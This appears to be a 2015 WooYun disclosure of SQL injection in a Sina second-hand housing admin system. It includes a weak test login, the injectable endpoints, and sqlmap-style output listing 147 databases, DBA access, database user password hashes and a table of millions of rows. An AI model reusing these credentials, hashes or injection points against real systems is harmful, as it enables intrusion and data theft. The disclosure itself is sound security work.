当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135713

漏洞标题:新浪某站点SQL注射(DBA权限/147个库/千万级数据)

相关厂商:新浪

漏洞作者: 男丶壹号

提交时间:2015-08-20 21:33

修复时间:2015-10-05 09:22

公开时间:2015-10-05 09:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

SQL注射

详细说明:

新浪二手房运营管理系统
http://opt.op.esf.sina.com.cn/
首先,弱口令:

账号:test
密码:123456


进去一看,测试账号,似乎没啥用:

1.jpg


仔细一看,全是注入点,列举几个,其余请厂商自查:

接口:http://opt.op.esf.sina.com.cn/hotdot/findcode
参数:phone


接口:http://opt.op.esf.sina.com.cn/company/all
参数:所有参数


接口:http://opt.op.esf.sina.com.cn/company/communityall
参数:所有参数


数据库 147个:

web application technology: Apache 2, PHP 5.2.14
back-end DBMS: MySQL 5.0.12
available databases [147]:
[*] admin_esf_leju_com
[*] bargain_esf_leju_com
[*] db_backup_esf
[*] house_refresh_bozhou
[*] house_refresh_cangzhou
[*] house_refresh_chaohu
[*] house_refresh_chuzhou
[*] house_refresh_cz
[*] house_refresh_datong
[*] house_refresh_dg
[*] house_refresh_fs
[*] house_refresh_fushun
[*] house_refresh_gg
[*] house_refresh_gl
[*] house_refresh_gy
[*] house_refresh_gz
[*] house_refresh_gz_opt
[*] house_refresh_haikou
[*] house_refresh_hhht
[*] house_refresh_huangshan
[*] house_refresh_huizhou
[*] house_refresh_hz
[*] house_refresh_jiangmen
[*] house_refresh_jinzhong
[*] house_refresh_klmy
[*] house_refresh_km
[*] house_refresh_ks
[*] house_refresh_lanzhou
[*] house_refresh_liuzhou
[*] house_refresh_luoyang
[*] house_refresh_lw
[*] house_refresh_nb
[*] house_refresh_nn
[*] house_refresh_nt
[*] house_refresh_pzh
[*] house_refresh_qhd
[*] house_refresh_quanzhou
[*] house_refresh_sanya
[*] house_refresh_suzh
[*] house_refresh_sz
[*] house_refresh_tangshan
[*] house_refresh_tongling
[*] house_refresh_ty
[*] house_refresh_weifang
[*] house_refresh_weihai
[*] house_refresh_wh
[*] house_refresh_wuhu
[*] house_refresh_wx
[*] house_refresh_xian
[*] house_refresh_xm
[*] house_refresh_xz
[*] house_refresh_yangjiang
[*] house_refresh_yangzhou
[*] house_refresh_yichang
[*] house_refresh_yuncheng
[*] house_refresh_zb
[*] house_refresh_zhongshan
[*] house_refresh_zhuhai
[*] house_refresh_zjk
[*] house_refresh_zz
[*] information_schema
[*] memory_esf_leju_com
[*] memory_esf_leju_com_opt
[*] mobile_esf_leju_com
[*] mobile_esf_leju_com_140304bak
[*] mysql
[*] performance_schema
[*] shop_admin
[*] shop_admin_opt
[*] shop_bozhou
[*] shop_cangzhou
[*] shop_cc
[*] shop_cd
[*] shop_chaohu
[*] shop_chuzhou
[*] shop_cq
[*] shop_cs
[*] shop_cz
[*] shop_datong
[*] shop_dg
[*] shop_dl
[*] shop_fs
[*] shop_fushun
[*] shop_fz
[*] shop_gg
[*] shop_gl
[*] shop_gy
[*] shop_gz
[*] shop_gz_opt
[*] shop_haikou
[*] shop_heb
[*] shop_hf
[*] shop_hhht
[*] shop_hk
[*] shop_huangshan
[*] shop_huizhou
[*] shop_hz
[*] shop_jiangmen
[*] shop_jinzhong
[*] shop_jn
[*] shop_klmy
[*] shop_km
[*] shop_ks
[*] shop_lanzhou
[*] shop_liuzhou
[*] shop_luoyang
[*] shop_lw
[*] shop_mem
[*] shop_nb
[*] shop_nc
[*] shop_nj
[*] shop_nn
[*] shop_nt
[*] shop_pzh
[*] shop_qd
[*] shop_qhd
[*] shop_quanzhou
[*] shop_sanya
[*] shop_sjz
[*] shop_suzh
[*] shop_suzhou
[*] shop_sy
[*] shop_sz
[*] shop_tangshan
[*] shop_tongling
[*] shop_ty
[*] shop_weifang
[*] shop_weihai
[*] shop_wh
[*] shop_wuhu
[*] shop_wx
[*] shop_xian
[*] shop_xm
[*] shop_xz
[*] shop_yangjiang
[*] shop_yangzhou
[*] shop_yichang
[*] shop_yt
[*] shop_yuncheng
[*] shop_zb
[*] shop_zhengzhou
[*] shop_zhongshan
[*] shop_zhuhai
[*] shop_zjk
[*] shop_zz
[*] test
[*] tongji


DBA权限:

web application technology: Apache 2, PHP 5.2.14
back-end DBMS: MySQL 5.0.12
current user is DBA:    True
database management system users password hashes:
[*] esfleju [2]:
    password hash: *67B391353B0793496FB597708CAFE0F95C68F74D
    password hash: *970DF458E2CEFFCE24AD3C53F121306A7E145DDE
[*] esfuser [1]:
    password hash: *970DF458E2CEFFCE24AD3C53F121306A7E145DDE
[*] lejuuser [1]:
    password hash: *079C6845550CCB18A943CB85165C96F5A0292A27
[*] monitor [1]:
    password hash: *2ABD94A7D02AFD760C6F9A7CDE115E6100C4B5B4
[*] root [1]:
    password hash: *8A83A5DEE3B1BC84E2B3FCA9370E705F57163510
[*] ssc [1]:
    password hash: *31BB83A3CB336C9405B3E5D0EF413F21A7309C31
[*] sunshicun2011 [1]:
    password hash: *F8AE15F683F3AA8793A6CC0651283DCB6E6B4D23
[*] test [1]:
    password hash: *23AE809DDACAF96AF0FD78ED04B6A265E05AA257
[*] tmpuser_leju [1]:
    password hash: *C22098F8D9F48CAF8CEACB53574843D2599D7173
[*] zuhouse [1]:
    password hash: *0953AAB6E4353661949A7EA65876631CA55BC178


随便找个库跑下表:

Database: mobile_esf_leju_com
[197 tables]
+----------------------------------+
| black_user                       |
| fj_admin_users                   |
| fj_apply_log                     |
| fj_certificate                   |
| fj_error_correction              |
| fj_exam_time                     |
| fj_exam_type                     |
| fj_express                       |
| fj_moni_options                  |
| fj_my_certificate                |
| fj_my_exam_answer                |
| fj_my_exam_log                   |
| fj_my_moni_answer                |
| fj_my_moni_log                   |
| fj_my_practice_answer            |
| fj_my_practice_log               |
| fj_my_questions                  |
| fj_my_section_answer             |
| fj_my_section_log                |
| fj_my_video_log                  |
| fj_option_pic_data               |
| fj_option_pic_data_copy          |
| fj_options                       |
| fj_order                         |
| fj_paper                         |
| fj_paper_questions               |
| fj_questions                     |
| fj_sections                      |
| fj_user_pay                      |
| fj_user_work_history             |
| fj_users                         |
| fj_video                         |
| fn_admingoldlog                  |
| fn_adminpermission               |
| fn_adminrole                     |
| fn_adminrole_permission          |
| fn_adminuser                     |
| fn_adminuser_role                |
| fn_authtoken                     |
| fn_bankcard                      |
| fn_beelog                        |
| fn_black_mobile                  |
| fn_black_user                    |
| fn_blackwhiteuser                |
| fn_chargprocess                  |
| fn_china_city                    |
| fn_china_district                |
| fn_china_province                |
| fn_clientimg                     |
| fn_communitydata                 |
| fn_communityindex                |
| fn_contacts                      |
| fn_continuousloginawards         |
| fn_coupon                        |
| fn_customer_201344               |
| fn_customer_201345               |
| fn_customer_201346               |
| fn_customer_201347               |
| fn_customer_201348               |
| fn_customer_201349               |
| fn_customer_201350               |
| fn_customer_201351               |
| fn_customer_201352               |
| fn_customer_201401               |
| fn_customer_201402               |
| fn_customer_201403               |
| fn_customer_201404               |
| fn_customer_201405               |
| fn_customer_201406               |
| fn_customer_201407               |
| fn_customer_201408               |
| fn_customer_201409               |
| fn_customer_201410               |
| fn_customer_201411               |
| fn_customer_201412               |
| fn_customer_201413               |
| fn_customer_201414               |
| fn_customer_201418               |
| fn_customer_201419               |
| fn_customer_201420               |
| fn_customer_201421               |
| fn_customer_201422               |
| fn_customer_201423               |
| fn_customer_201424               |
| fn_customer_201426               |
| fn_customer_201427               |
| fn_customer_201428               |
| fn_customer_201429               |
| fn_customer_201430               |
| fn_customer_400                  |
| fn_customer_getlogs              |
| fn_customer_lock                 |
| fn_dblog                         |
| fn_dealhouse                     |
| fn_error_log                     |
| fn_esf_sendlog                   |
| fn_esfhouse_logs                 |
| fn_esfhouse_start_logs           |
| fn_esfhouse_stat                 |
| fn_expend                        |
| fn_expend_bak                    |
| fn_extract                       |
| fn_extract_count                 |
| fn_fnjuser                       |
| fn_friend                        |
| fn_gold_log                      |
| fn_gold_order                    |
| fn_group_address                 |
| fn_group_content                 |
| fn_group_information             |
| fn_group_member                  |
| fn_home                          |
| fn_home400_sendlogs              |
| fn_home_agentmain                |
| fn_housedata                     |
| fn_houseindex                    |
| fn_housepv                       |
| fn_houseshow                     |
| fn_houseuser                     |
| fn_huodong                       |
| fn_huodong_money_flow            |
| fn_huodong_user_whitelist        |
| fn_huodong_user_whitelist_log    |
| fn_importusererrorlog            |
| fn_incomeflow                    |
| fn_incomeflow_tmp                |
| fn_invite                        |
| fn_invite_bak                    |
| fn_invite_bak1                   |
| fn_login_area                    |
| fn_login_logs                    |
| fn_loginip                       |
| fn_merge_log                     |
| fn_message                       |
| fn_mytask                        |
| fn_notify                        |
| fn_pay_logs                      |
| fn_pay_order                     |
| fn_perday_click                  |
| fn_perday_log                    |
| fn_picture                       |
| fn_point_log                     |
| fn_private_content               |
| fn_private_msg                   |
| fn_recharge_count                |
| fn_redpackethousinglink          |
| fn_redpackethousinglinklog       |
| fn_rewardflow                    |
| fn_rule_log                      |
| fn_rushlog                       |
| fn_shop_promote                  |
| fn_shpushinterfacelog            |
| fn_spstatistics                  |
| fn_statistics_agent              |
| fn_statistics_company            |
| fn_statistics_invite             |
| fn_statistics_shop               |
| fn_statisticvoucher              |
| fn_subphone                      |
| fn_sysaccess                     |
| fn_syscompany                    |
| fn_syscompany_shop               |
| fn_sysgroup                      |
| fn_sysgroup_access               |
| fn_sysmsg                        |
| fn_sysresource                   |
| fn_sysuser                       |
| fn_sysuser_city                  |
| fn_sysuser_group                 |
| fn_talklog                       |
| fn_talklog_bak                   |
| fn_tasks                         |
| fn_template                      |
| fn_user                          |
| fn_user_bak                      |
| fn_user_cnt                      |
| fn_user_ids                      |
| fn_user_subphone                 |
| fn_user_subphone_line            |
| fn_user_subphone_log             |
| fn_user_weimi                    |
| fn_user_yiqiso                   |
| fn_userinvite                    |
| fn_userlimits                    |
| fn_wallet                        |
| fn_wb_info                       |
| fn_wb_user                       |
| fn_weixin_community              |
| fn_weixin_hongbao                |
| fn_weixin_hongbao_log            |
| fn_weixin_hongbao_tmp            |
| fn_weixin_hongbao_user_whitelist |
| fn_weixin_user                   |
| fn_weixin_user_blacklist         |
| fn_wminfo                        |
| test_api                         |
| touch_index_reflink              |
+----------------------------------+


随便找个表记录条数 600多万(目测是深圳房源数据):

Database: house_refresh_sz
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| sp_house_refresh | 6141012 |
+------------------+---------+


测试,点到为止,未下载任何数据。

漏洞证明:

修复方案:

你们更专业。

版权声明:转载请注明来源 男丶壹号@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-21 09:21

厂商回复:

感谢支持,已转给合作方处理

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-21 02:06 | SunnyDoll ( 实习白帽子 | Rank:32 漏洞数:10 | 职业搬砖工)

    神奇的路人甲 CCAV看这里

  2. 2015-08-21 09:38 | Manning ( 普通白帽子 | Rank:571 漏洞数:81 | 就恨自己服务器太少)

    。。。。。hiahiahia

  3. 2015-08-21 09:47 | prolog ( 普通白帽子 | Rank:567 漏洞数:108 | 低调求发展)

    5...

  4. 2015-08-21 11:40 | 张泽大菜鸟 ( 路人 | Rank:8 漏洞数:1 | 哪怕再菜的鸟,早起也会有虫吃。)

    新浪!